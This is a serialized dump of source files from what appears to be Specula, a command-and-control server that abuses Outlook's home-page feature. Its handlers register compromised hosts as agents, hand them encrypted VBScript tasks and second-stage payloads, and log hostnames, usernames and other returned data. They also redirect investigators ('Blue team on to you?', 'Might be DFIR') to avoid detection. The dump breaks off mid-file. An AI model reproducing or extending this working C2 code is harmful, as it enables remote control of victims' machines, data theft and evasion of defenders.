# intentional fall through to base.html render\r\n # set firstseen to now\r\n agent.firstseen = datetime.now().strftime(gconfig.TIME_FORMAT)\r\n elif agent.remoteip != remote_ip:\r\n if gconfig.PUSH_NEWIP == \"True\":\r\n self.application.helpers.sendPush(agent.remoteip, agent.hostname,\r\n \"New ip on existing agent, updating to {}\".format(remote_ip))\r\n agent.remoteip = remote_ip\r\n # intentional fall through\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Agent Connected\")\r\n handled = True\r\n self.render('base.html',\r\n REFRESH_TIME=self.application.helpers.addJitter(agent.jitter, agent.refreshtime),\r\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\r\n LOADSUPPORT=LOADSUPPORT.format(DLName, agent.supporturl),\r\n DLSUPPORT=DLName,\r\n CLSID=gconfig.CLSID)\r\n break\r\n\r\n if not handled:\r\n if gconfig.PUSH_UNKNOWNCONNECTION == \"True\":\r\n self.application.helpers.sendPush(remote_ip, \"UNKNOWN/Blue team\",\r\n \"Call in to our valid handler url, but not in database - Blue team on to you?\")\r\n self.render('base.html',\r\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\r\n LOADSUPPORT=\"\",\r\n DLSUPPORT=\"\",\r\n CLSID=gconfig.CLSID)\r\n self.application.helpers.save_agents_to_file()\r\n else:\r\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \"): Inbound connection with wrong UserAgent - Useragent: \" + user_agent)\r\n if gconfig.PUSH_UNEXPECTEDCALLBACK == \"True\":\r\n self.application.helpers.sendPush(remote_ip, \"UNKNOWN/Blue team\", \"Connection with unexpected useragent: \" + user_agent)\r\n if gconfig.REDIRECT_FALSE_AGENTS.lower() == \"template\":\r\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \"): REDIRECTING to template **Evil laugh**\")\r\n self.render('redirect_template.html')\r\n else:\r\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \"): REDIRECTING to \" + gconfig.REDIRECT_FALSE_AGENTS + \" **Evil laugh**\")\r\n self.redirect(gconfig.REDIRECT_FALSE_AGENTS)\r\n\r\n def post(self):\r\n user_agent = self.request.headers.get(\"User-Agent\")\r\n url = self.request.full_url()\r\n uri = self.request.uri\r\n remote_ip = self.request.remote_ip\r\n self.application.helpers.speclog(\"*** [INBOUND POST] (\" + remote_ip + \") - [URL]: \" + self.request.full_url())\r\n #TODO right now we return a 404, is that the intent\r\n if self.application.helpers.inblocklist(remote_ip) or self.application.helpers.pastenddate():\r\n self.application.helpers.speclog('*** [blocklisted IP or ENDDATE] ({}): Valid POST endpoint request from blocklisted ip'.format(remote_ip))\r\n self.set_status(404)\r\n elif 'Outlook' in user_agent:\r\n try:\r\n returndata = tornado.escape.json_decode(self.request.body)\r\n for agent in self.application.helpers.a_list:\r\n if urlparse(agent.url).path == uri:\r\n t = None\r\n if agent.tasks != []:\r\n #call return data handler of task\r\n t = agent.tasks.pop(0)\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Data returned from agent\")\r\n returndata_decoded = decrypt_code(returndata,agent.encryptionkey)\r\n if t is None or t.printlog:\r\n with open(\"agent_data/\" + agent.hostname + \".txt\", \"a+\") as agent_log:\r\n agent_log.write(datetime.now().strftime(self.application.helpers.timeformat) + \" -- \" + t.name + \"\\n\")\r\n agent_log.write(returndata_decoded + \"\\n\\n\")\r\n self.application.helpers.speclog(\r\n \"*** [AGENTCOM] (\" + remote_ip + \"): RETURN DATA - \" + returndata)\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Data written to agent_data/\" + agent.hostname + \".txt\")\r\n if t is not None:\r\n mod = tmp = None\r\n if t.name in self.application.helpers.modlist:\r\n mod, tmp = self.application.helpers.modlist[t.name]\r\n elif t.name in self.application.helpers.hiddenmods:\r\n mod, tmp = self.application.helpers.hiddenmods[t.name]\r\n if mod is not None:\r\n module = mod.Spec(tmp, self.application.helpers)\r\n try:\r\n module.rethandler(agent, t.options, returndata_decoded)\r\n if module.entry == 'list_basic':\r\n agent.remoteip = self.request.remote_ip\r\n agent.useragent = user_agent\r\n if agent.prestaged:\r\n agent.prestaged = False\r\n if gconfig.PUSH_PRESTAGE == \"True\":\r\n self.application.helpers.sendPush(remote_ip, agent.hostname, \"Prestaged agent first checkin\")\r\n except Exception as msg:\r\n self.application.helpers.speclog(\"*** [AGENTCOM] ({}) ({}) error calling rethandler for task {}\"\r\n \"\\t{}\".format(remote_ip, agent.hostname, t.name, msg))\r\n pass\r\n finally:\r\n del module\r\n del t\r\n self.application.helpers.save_agents_to_file() #UPDATE DB FILE\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Removed executed task from queue\")\r\n break\r\n else:\r\n self.set_status(404)\r\n except ValueError:\r\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \") - POST data sent was invalid - Might be DFIR\")\r\n else:\r\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \") - Invalid Useragent on POST - Something phishy is going on!\")\r\n self.set_status(404)" }, { "path": "lib/handlers/specdevcomms.py", "content": "import copy\nfrom urllib.parse import unquote, urlparse\nfrom lib.core.specagents import AgentClass\nfrom lib.core.utility import encrypt_code, decrypt_code, TaskClass\nimport tornado\nfrom datetime import datetime\nfrom lib.core.setup import gconfig\n\nclass AgentDevComHandler(tornado.web.RequestHandler):\n def set_default_headers(self):\n self.set_header('Server', gconfig.SERVER_HEADER)\n\n def get(self):\n user_agent = self.request.headers.get(\"User-Agent\")\n url = self.request.full_url()\n uri = self.request.uri\n remote_ip = self.request.remote_ip\n handled = False\n self.application.helpers.speclog(\"*** [INBOUND GET] (\" + remote_ip + \") - [URL]: \" + self.request.full_url())\n if self.application.helpers.inblocklist(remote_ip):\n self.application.helpers.speclog('*** [blocklisted IP] ({}): Valid GET endpoint request from blocklisted ip'.format(remote_ip))\n self.render('blocklist.html')\n return\n elif 'Outlook' in user_agent:\n self.application.helpers.speclog(\"*** [DEVAGENTCOM] (\" + remote_ip + \"): Valid Useragent\")\n agent: AgentClass # type anotation\n if self.application.helpers.pastenddate():\n handled = True\n self.application.helpers.speclog(\"*** [ENDDATE] (\" + remote_ip + \"): Returning Nothing\")\n self.render('dev_blank.html',\n REFRESH_TIME=99999,\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n CLSID=gconfig.CLSID)\n return\n for agent in self.application.helpers.a_list:\n #Doing urlparse to compare only the url and not hostname\n if urlparse(agent.codeurl).path == uri: #Code url - server encrypted vbscode\n self.application.helpers.speclog(\"*** [DEVAGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Requesting Encrypted Code\")\n self.set_header(\"Cache-Control\", \"no-store\")\n if len(agent.tasks) == 0:\n self.set_status(404)\n else:\n code = agent.tasks[0].code\n if agent.tasks[0].encrypt:\n code = encrypt_code(code, agent.encryptionkey)\n self.write(code)\n handled = True\n break\n if urlparse(agent.url).path == uri: #Unique url per agent\n self.set_header(\"Cache-Control\", \"no-store\")\n self.application.helpers.speclog(\"*** [DEVAGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Unique Agent URL triggered\")\n self.application.helpers.speclog(\"*** [DEVAGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Updating Lastseen, Useragent and callback count\")\n agent.update_callback()\n agent.lastcheckin = datetime.now().strftime(self.application.helpers.timeformat)\n agent.useragent = user_agent\n if agent.remoteip == \"10.10.10.10\": ## This is the task for prestaged clients to update db info\n if agent.prestaged != True: # we flip this after the the first callin cycle\n self.application.helpers.sendPush(remote_ip, \"None\", \"[!] Unexpected Prestaged callback\")\n handled = True\n self.render('dev_blank.html',\n REFRESH_TIME=self.application.helpers.addJitter(agent.jitter, agent.refreshtime),\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n CLSID=gconfig.CLSID)\n else:\n self.application.helpers.speclog(\"*** [DEVAGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Prestaged agents first checkin, executing special task to update database\")\n function_enc = encrypt_code(\"list_basic()\",agent.encryptionkey) #Added for test\n url_enc = encrypt_code(agent.url+\"1194\",agent.encryptionkey)\n codeurl_enc = encrypt_code(agent.codeurl,agent.encryptionkey)\n mod = self.application.helpers.get_module('enumerate/host/list_basic')\n task = TaskClass('enumerate/host/list_basic',\n self.application.helpers.renderModule(mod),\n mod.entry,\n {},\n True)\n agent.add_task(task)\n handled = True\n self.render('dev_encrypted_task_template.html',\n url=url_enc,\n function_name=function_enc,\n REFRESH_TIME=self.application.helpers.addJitter(agent.jitter, agent.refreshtime),\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n CODEURL=codeurl_enc,\n ENCRYPTIONKEY_LOCATION=gconfig.ENCRYPTIONKEY_REGISTRY_LOCATION,\n ENCRYPTIONKEY_VALUENAME=gconfig.ENCRYPTIONKEY_VALUENAME\n )\n break\n elif agent.remoteip != remote_ip:\n self.application.helpers.sendPush(agent.remoteip, agent.hostname,\n \"New ip on existing agent, updating to {}\".format(remote_ip))\n agent.remoteip = remote_ip\n handled = True\n self.render('dev_blank.html',\n REFRESH_TIME=self.application.helpers.addJitter(agent.jitter, agent.refreshtime),\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n CLSID=gconfig.CLSID)\n break\n if agent.tasks == []: #NO TASKS IN QUEUE\n self.application.helpers.speclog(\"*** [DEVAGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): No tasks in queue, rendering dev_blank.html\")\n handled = True\n self.render('dev_blank.html',\n REFRESH_TIME=self.application.helpers.addJitter(agent.jitter, agent.refreshtime),\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n CLSID=gconfig.CLSID)\n break\n self.application.helpers.speclog(\"*** [DEVAGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Task Found - \" + agent.tasks[0].name + \" - Initiating Execution\")\n function = agent.tasks[0].entry + \"()\"\n self.application.helpers.speclog(\"*** [DEVAGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): VBScript Function with Parameters sent - \" + function)\n function_enc = encrypt_code(function,agent.encryptionkey) #Added for test\n url_enc = encrypt_code(agent.url,agent.encryptionkey)\n codeurl_enc = encrypt_code(agent.codeurl,agent.encryptionkey)\n template = 'encrypted_task_template.html'\n handled = True\n if len(agent.tasks) > 0 and not agent.tasks[0].encrypt:\n if gconfig.DEBUG:\n self.render('debugunencrypted_task_template.html',\n url=url_enc,\n function_name=function_enc,\n REFRESH_TIME=self.application.helpers.addJitter(agent.jitter, agent.refreshtime),\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n code=agent.tasks[0].code,\n CLSID=gconfig.CLSID)\n else:\n self.render('dev_unencrypted_task_template.html',\n url=url_enc,\n function_name=function_enc,\n REFRESH_TIME=self.application.helpers.addJitter(agent.jitter, agent.refreshtime),\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n CODEURL=codeurl_enc,\n CLSID=gconfig.CLSID,\n ENCRYPTIONKEY_LOCATION=gconfig.ENCRYPTIONKEY_REGISTRY_LOCATION,\n ENCRYPTIONKEY_VALUENAME=gconfig.ENCRYPTIONKEY_VALUENAME\n )\n else:\n self.render('dev_encrypted_task_template.html',\n url=url_enc,\n function_name=function_enc,\n REFRESH_TIME=self.application.helpers.addJitter(agent.jitter, agent.refreshtime),\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n CODEURL=codeurl_enc,\n CLSID=gconfig.CLSID,\n ENCRYPTIONKEY_LOCATION=gconfig.ENCRYPTIONKEY_REGISTRY_LOCATION,\n ENCRYPTIONKEY_VALUENAME=gconfig.ENCRYPTIONKEY_VALUENAME\n )\n break\n if not handled:\n self.application.helpers.sendPush(remote_ip, \"UNKNOWN\",\n \"Call in to our valid handler url, but not in database\")\n self.render('dev_blank.html',\n REFRESH_TIME=99999,\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n CLSID=gconfig.CLSID)\n self.application.helpers.save_agents_to_file()\n else:\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \"): Inbound connection with wrong UserAgent - Useragent: \" + user_agent)\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \"): REDIRECTING to \" + gconfig.REDIRECT_FALSE_AGENTS + \" **Evil laugh**\")\n self.redirect(gconfig.REDIRECT_FALSE_AGENTS)\n\n def post(self):\n user_agent = self.request.headers.get(\"User-Agent\")\n url = self.request.full_url()\n uri = self.request.uri\n remote_ip = self.request.remote_ip\n \n self.application.helpers.speclog(\"*** [INBOUND POST] (\" + remote_ip + \") - [URL]: \" + self.request.full_url())\n #TODO right now we return a 404, is that the intent\n if self.application.helpers.inblocklist(remote_ip) or self.application.helpers.pastenddate():\n self.application.helpers.speclog('*** [blocklisted IP or ENDDATE] ({}): Valid POST endpoint request from blocklisted ip'.format(remote_ip))\n self.set_status(404)\n elif 'Outlook' in user_agent:\n try:\n returndata = tornado.escape.json_decode(self.request.body)\n for agent in self.application.helpers.a_list:\n if urlparse(agent.url).path+\"1194\" == uri:\n ### Prestaged client running first update ###\n self.application.helpers.speclog(\n \"*** [AGENTCOM] (\" + remote_ip + \"): RETURN DATA - \" + returndata)\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Prestaged client posting back for the first time\")\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Updating prestaged client database data\")\n returndata_decoded = decrypt_code(returndata,agent.encryptionkey)\n agent.username = returndata_decoded.split()[1]\n if agent.remoteip != '10.10.10.10' or agent.prestaged is not True: # not the first use of this prestaged agent\n self.application.helpers.sendPush(agent.remoteip, agent.hostname, 'prestaged agent used more then once likely being investigated. new ip:hostname {}:{}'.format(self.request.remote_ip, returndata_decoded.split()[3]))\n #TODO ok cool now what are we going to automatically do about it\n else:\n self.application.helpers.sendPush(self.request.remote_ip, returndata_decoded.split()[3], 'prestaged agent first checkin! ')\n agent.hostname = returndata_decoded.split()[3]\n agent.remoteip = self.request.remote_ip\n agent.lastcheckin = datetime.now().strftime(self.application.helpers.timeformat)\n agent.useragent = user_agent\n self.application.helpers.save_agents_to_file()\n break\n\n if urlparse(agent.url).path == uri:\n t = None\n if agent.tasks != []:\n #call return data handler of task\n t = agent.tasks.pop(0)\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Data returned from agent\")\n returndata_decoded = decrypt_code(returndata,agent.encryptionkey)\n if t is None or t.printlog:\n with open(\"agent_data/\" + agent.hostname + \".txt\", \"a+\") as agent_log:\n agent_log.write(datetime.now().strftime(self.application.helpers.timeformat) + \" -- \" + t.name + \"\\n\")\n agent_log.write(returndata_decoded + \"\\n\\n\")\n self.application.helpers.speclog(\n \"*** [AGENTCOM] (\" + remote_ip + \"): RETURN DATA - \" + returndata)\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Data written to agent_data/\" + agent.hostname + \".txt\")\n if t is not None:\n mod = tmp = None\n if t.name in self.application.helpers.modlist:\n mod, tmp = self.application.helpers.modlist[t.name]\n elif t.name in self.application.helpers.hiddenmods:\n mod, tmp = self.application.helpers.hiddenmods[t.name]\n if mod is not None:\n module = mod.Spec(tmp, self.application.helpers)\n try:\n module.rethandler(agent, t.options, returndata_decoded)\n except Exception as msg:\n self.application.helpers.speclog(\"*** [AGENTCOM] ({}) ({}) error calling rethandler for task {}\"\n \"\\t{}\".format(remote_ip, agent.hostname, t.name, msg))\n pass\n finally:\n del module\n del t\n self.application.helpers.save_agents_to_file() #UPDATE DB FILE\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Removed executed task from queue\")\n break\n else:\n self.set_status(404)\n except ValueError:\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \") - POST data sent was invalid - Might be DFIR\")\n else:\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \") - Invalid Useragent on POST - Something phishy is going on!\")\n self.set_status(404)" }, { "path": "lib/handlers/specpayload.py", "content": "import tornado\nfrom urllib.parse import urlparse\nfrom lib.core.setup import gconfig\n\nclass PayloadHandler(tornado.web.StaticFileHandler):\n def set_default_headers(self):\n self.set_header('Server', gconfig.SERVER_HEADER)\n\n #def write_error(self, status_code, **kwargs):\n # if status_code == 404:\n # self.redirect('http://example.com') # Fetching a default resource\n" }, { "path": "lib/handlers/specvalidate.py", "content": "import tornado\nimport base64\nfrom datetime import datetime\nfrom urllib.parse import urlparse\nfrom lib.core.specagents import AgentClass\nimport copy\nfrom lib.core.setup import gconfig\n\nclass ValidateAgentHandler(tornado.web.RequestHandler):\n def set_default_headers(self):\n self.set_header('Server', gconfig.SERVER_HEADER)\n\n hostname = urlparse(gconfig.DNS_NAME).hostname\n def get(self):\n ### Get User agent and remote ip ###\n user_agent = self.request.headers.get(\"User-Agent\")\n remote_ip = self.request.remote_ip\n self.application.helpers.speclog(\"*** [INBOUND GET] (\" + remote_ip + \") - [URL]: \" + self.request.full_url())\n if self.application.helpers.inblocklist(remote_ip) and 'Outlook' not in user_agent:\n self.application.helpers.speclog(\"*** [blocklisted IP] ({})\".format(remote_ip))\n self.redirect(gconfig.REDIRECT_FALSE_AGENTS)\n elif self.application.helpers.inblocklist(remote_ip) and 'Outlook' in user_agent:\n self.render('blocklist.html',\n CLSID=gconfig.CLSID)\n elif 'Outlook' in user_agent:\n if self.application.helpers.pastenddate():\n self.application.helpers.speclog(\"*** [ENDDATE] (\" + remote_ip + \"): Returning Nothing\")\n self.render('base.html',\n REFRESH_TIME=99999,\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n CLSID=gconfig.CLSID)\n return\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \"): Valid Useragent\")\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \"): Rendering validation.html\")\n hn = urlparse(self.request.full_url()).hostname\n if hn != self.hostname:\n self.application.helpers.speclog(\"\"\"\n*** [WARNING] The Hostname we are returning does not equal the hostname used\n {} != {}\"\"\".format(hn, self.hostname))\n port_value = \"\" \n if gconfig.WEBSERVER_PORT not in (80, 443):\n port_value = f\":{gconfig.WEBSERVER_PORT}\"\n self.render('validation.html',\n DNS=gconfig.DNS_NAME,\n PORT=port_value,\n URL=gconfig.VALIDATE_URL,\n REFRESH_TIME=self.application.helpers.addJitter(gconfig.JITTER, gconfig.DEFAULT_REFRESH_TIME),\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\n CLSID=gconfig.CLSID,\n ENCRYPTIONKEY_LOCATION = gconfig.ENCRYPTIONKEY_REGISTRY_LOCATION,\n ENCRYPTIONKEY_VALUENAME = gconfig.ENCRYPTIONKEY_VALUENAME\n )\n else:\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \"): Inbound connection with wrong UserAgent - Useragent: \" + user_agent)\n if gconfig.REDIRECT_FALSE_AGENTS.lower() == \"template\":\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \"): REDIRECTING to template **Evil laugh**\")\n self.render('redirect_template.html')\n else:\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \"): REDIRECTING to \" + gconfig.REDIRECT_FALSE_AGENTS + \" **Evil laugh**\")\n self.redirect(gconfig.REDIRECT_FALSE_AGENTS)\n\n def post(self):\n user_agent = self.request.headers.get(\"User-Agent\")\n remote_ip = self.request.remote_ip\n self.application.helpers.speclog(\"*** [INBOUND POST] (\" + remote_ip + \") - [URL]: \" + self.request.full_url())\n if self.application.helpers.inblocklist(remote_ip) or self.application.helpers.pastenddate():\n self.application.helpers.speclog(\"*** [blocklisted IP or ENDDATE] ({}): attempted post request\".format(remote_ip))\n self.set_status(404)\n elif 'Outlook' in user_agent:\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \"): Valid Useragent\")\n try:\n sessionid = tornado.escape.json_decode(self.request.body)\n agent_hostname = copy.deepcopy(sessionid)\n agent_hostname = base64.b64decode(agent_hostname).decode(\"utf-16le\", \"ignore\").split(\"|\")[0]\n\n ### CHECK IF IN DB ###\n found = 0\n if self.application.helpers.a_list != []: # check a_list not empty\n agent: AgentClass # type anotation\n for agent in self.application.helpers.a_list:\n if agent.sessionid == sessionid:\n agent.update_callback()\n agent.lastcheckin = datetime.now().strftime(gconfig.TIME_FORMAT)\n #self.application.helpers.speclog(\"*** [INITIAL AGENT] - \" + agent_hostname + \": Agent already in Database - Outlook most likely needs to be restarted for it to pickup new url\")\n found = 1\n agent.updateinitialcheckincount(agent.initialcheckincount+1) # Add 1 to checkin count\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): Increasing Initial Checkin Count\")\n #print(agent.approved)\n if agent.approved == True:\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): Agent is approved\")\n if agent.keysent == False:\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): Agent is approved - But encryption key not sent\")\n self.write(agent.encryptionkey + \"||\" + agent.url)\n agent.keysent = True\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): Encryption key sent\")\n if gconfig.PUSH_NEWAGENT == \"True\":\n self.application.helpers.sendPush(agent.remoteip, agent.hostname, \"New Fully Authenticated Agent! New URL and Encryption key sent to agent. Time to get pwning!\")\n else:\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): Outlook needs to restart to pick up new url\")\n else:\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): Agent is not approved yet - Checkin Count is too low\")\n #Check if initial checkin count - Set Approved value in DB to true\n if agent.initialcheckincount == gconfig.INITIAL_CHECKIN_COUNT-1:\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): Agent has reached enough checkins - Agent set to Approved\")\n agent.approved = True\n agent.generate_com() #Generate urls and encryption\n if gconfig.PUSH_NEWAGENT == \"True\":\n self.application.helpers.sendPush(agent.remoteip, agent.hostname, \"New Approved Agent!\")\n\n self.application.helpers.save_agents_to_file()\n\n ### Not found in existing asset db - Register it ###\n if found == 0:\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): New Agent - Registering in Database\")\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): Writing post data to agent_data/\" + agent_hostname + \".txt\")\n agent_log = open(\"agent_data/\" + agent_hostname + \".txt\", \"a+\")\n agent_log.write(datetime.now().strftime(gconfig.TIME_FORMAT) + \"\\n\")\n agent_log.write(\"Hostname|Username:\\n\")\n agent_log.write(base64.b64decode(sessionid).decode(\"utf-16le\", \"ignore\") + \"\\n\\n\")\n agent_log.close()\n self.application.helpers.a_list.register_agent(sessionid, remote_ip, user_agent, datetime.now().strftime(gconfig.TIME_FORMAT))\n self.application.helpers.save_agents_to_file() #UPDATE DB FILE\n if gconfig.PUSH_VALIDATION == \"True\":\n self.application.helpers.sendPush(remote_ip, base64.b64decode(sessionid).decode(\"utf-16le\", \"ignore\"), \"New Validation Ongoing!\")\n \n else: # Empty DB - Register agent\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): Not in Database - New Agent - Registering in Database\")\n self.application.helpers.speclog(\"*** [VALIDATION CHECK] (\" + remote_ip + \") (\" + agent_hostname + \"): Writing post data to agent_data/\" + agent_hostname + \".txt\")\n agent_log = open(\"agent_data/\" + agent_hostname + \".txt\", \"a+\")\n agent_log.write(datetime.now().strftime(gconfig.TIME_FORMAT) + \"\\n\")\n agent_log.write(\"Hostname|Username:\\n\")\n agent_log.write(agent_hostname) ## Add username\n agent_log.write(base64.b64decode(sessionid).decode(\"utf-16le\", \"ignore\") + \"\\n\\n\")\n agent_log.close()\n self.application.helpers.a_list.register_agent(sessionid, remote_ip, user_agent, datetime.now().strftime(gconfig.TIME_FORMAT))\n self.application.helpers.save_agents_to_file() #UPDATE DB FILE\n if gconfig.PUSH_VALIDATION == \"True\":\n self.application.helpers.sendPush(remote_ip, base64.b64decode(sessionid).decode(\"utf-16le\", \"ignore\"), \"New Validation Ongoing!\")\n except ValueError:\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \") - POST data sent was invalid - Might be DFIR\")\n else:\n self.application.helpers.speclog(\"*** [ALERT] (\" + remote_ip + \") - Invalid Useragent on POST - Something phishy is going on!\")\n self.set_status(404)\n\n\nclass UnknownPageHandler(tornado.web.RequestHandler):\n \"\"\"No Endpoint Handler.\"\"\"\n\n def set_default_headers(self):\n self.set_header('Server', gconfig.SERVER_HEADER)\n\n def get(self):\n ips = [a.remoteip for a in self.application.helpers.a_list]\n if self.request.remote_ip in ips:\n agent = [a for a in self.application.helpers.a_list if a.remoteip == self.request.remote_ip][0]\n paths = [urlparse(a).path for a in agent.otherurls.keys()]\n if self.request.uri in paths:\n self.application.helpers.speclog(\n \"*** [AGENTCOM] (\" + agent.remoteip + \") (\" + agent.hostname + \"): Requesting second stage\")\n self.set_header(\"Cache-Control\", \"no-store\")\n self.write(agent.otherurls.pop(gconfig.DNS_NAME + self.request.uri))\n return\n ### Default Get Handler ###\n self.application.helpers.weblog.warning('Request to Invalid Page from {}'.format(self.request.remote_ip))\n self.application.helpers.speclog(\"*** [ALERT] (\" + self.request.remote_ip + \") - Connection attempt to none Specula url - Possibly DFIR or Internet saying hello\")\n if gconfig.PUSH_CONNECTION_OUTSIDESPECULA == \"True\":\n self.application.helpers.sendPush(self.request.remote_ip, self.request.uri, \"Connection attempt outside of Specula\")\n self.application.helpers.speclog(\"*** [ALERT] (\" + self.request.remote_ip + \") - [URL]: \" + self.request.full_url())\n #self.write('{\"status\": \"ERROR: Unknown API Endpoint.\"}\\n')\n return\n\n### FUNCTIONS ###\n" }, { "path": "lib/handlers/validation.html", "content": "\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nOutlook\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "path": "lib/menu/specpromptdbedit.py", "content": "import random\nimport secrets\nimport string\nimport os\nimport cmd\nimport base64\nimport inspect\nfrom datetime import datetime\nfrom lib.core.setup import gconfig\nfrom lib.core.helpers import Helpers\n\n\nclass SpecPromptDbedit(cmd.Cmd):\n def __init__(self, selected_agent, helpers):\n print(\"SHOULD ONLY BE USED FOR EDITING IF YOU KNOW WHAT YOU ARE DOING!\")\n self.ranAuto = False\n self.helpers = helpers\n self.selected_agent = selected_agent\n super().__init__()\n while len(self.helpers.rccommands) > 0:\n if self.onecmd(self.helpers.rccommands.pop(0)) is True:\n self.ranAuto = True\n return\n completekey = 'tab'\n\n def precmd(self, line): # Added for operator logging\n self.helpers.operatorlog(str(\" \"+line), False)\n return(line)\n\n def emptyline(self):\n \"\"\"Called when an empty line is entered in response to the prompt.\n\n If this method is not overridden, it repeats the last nonempty\n command entered.\n\n \"\"\"\n if self.lastcmd:\n self.lastcmd = \"\"\n return self.onecmd('\\n')\n \n def do_list(self, inp):\n outlist = {}\n try:\n for value in vars(self.selected_agent):\n if value == \"encryptedvbsfunctions\":\n pass\n elif value == \"tasks\":\n outlist.update( {\"tasks in queue\" : len(self.selected_agent.tasks) })\n else:\n outlist.update( {value : str(vars(self.selected_agent)[value]) })\n for key,val in sorted(outlist.items()):\n print(\"{} : {}\".format(key,val) , end=\"\\n\")\n except ValueError:\n print(\"Something went wrong...Not sure what\")\n \n def help_list(self):\n print(\"Description: Lists out all agent properties\")\n print(\"Usage: list\")\n\n def do_set(self, cmd):\n args = Helpers.getarguments(cmd)\n if len(args) == 0:\n print(\"You need to specify a value to edit\")\n return\n key = args.pop(0)\n if len(args) == 0:\n val = None\n else:\n val = ' '.join(args)\n try:\n if hasattr(self.selected_agent, key):\n setattr(self.selected_agent, key, val)\n print(\"{} Updated to {}\".format(key,val))\n else:\n print(\"Invalid setting\")\n except Exception as msg:\n print(\"Failed to set option: {}\".format(msg))\n\n def help_set(self):\n print(\"Description: use this to change a setting\")\n print(\"Usage: set \")\n print(\"Should only be used if you know what you are doing\\n\"\n \"Example: set refreshtime 100\\n\"\n \"Example: set keysent False\")\n\n\n def complete_set(self, text, line, begidx, endidx):\n return [i for i, j in inspect.getmembers(self.selected_agent) if i.startswith(text) and i[0] != '_']\n\n\n\n def do_clear(self, inp):\n os.system('clear')\n\n def help_clear(self):\n print(\"Description: Clears the screen\")\n print(\"Usage: clear\")\n \n def do_back(self, inp):\n return True\n\n def help_back(self):\n print(\"Description: Goes back in the menu\")\n print(\"Usage: back\")\n\n" }, { "path": "lib/menu/specpromptexplorer.py", "content": "\nimport os\nimport cmd\nimport copy\nfrom pathlib import PureWindowsPath\nimport traceback\nfrom datetime import datetime\nfrom lib.core.setup import gconfig\nfrom lib.core.helpers import Helpers\nfrom lib.menu.specpromptmodule import SpecPromptModule\nfrom lib.core.utility import TaskClass\n\nclass SpecPromptExplorer(cmd.Cmd):\n def __init__(self, selected_agent, helpers):\n self.ranAuto = False\n self.helpers = 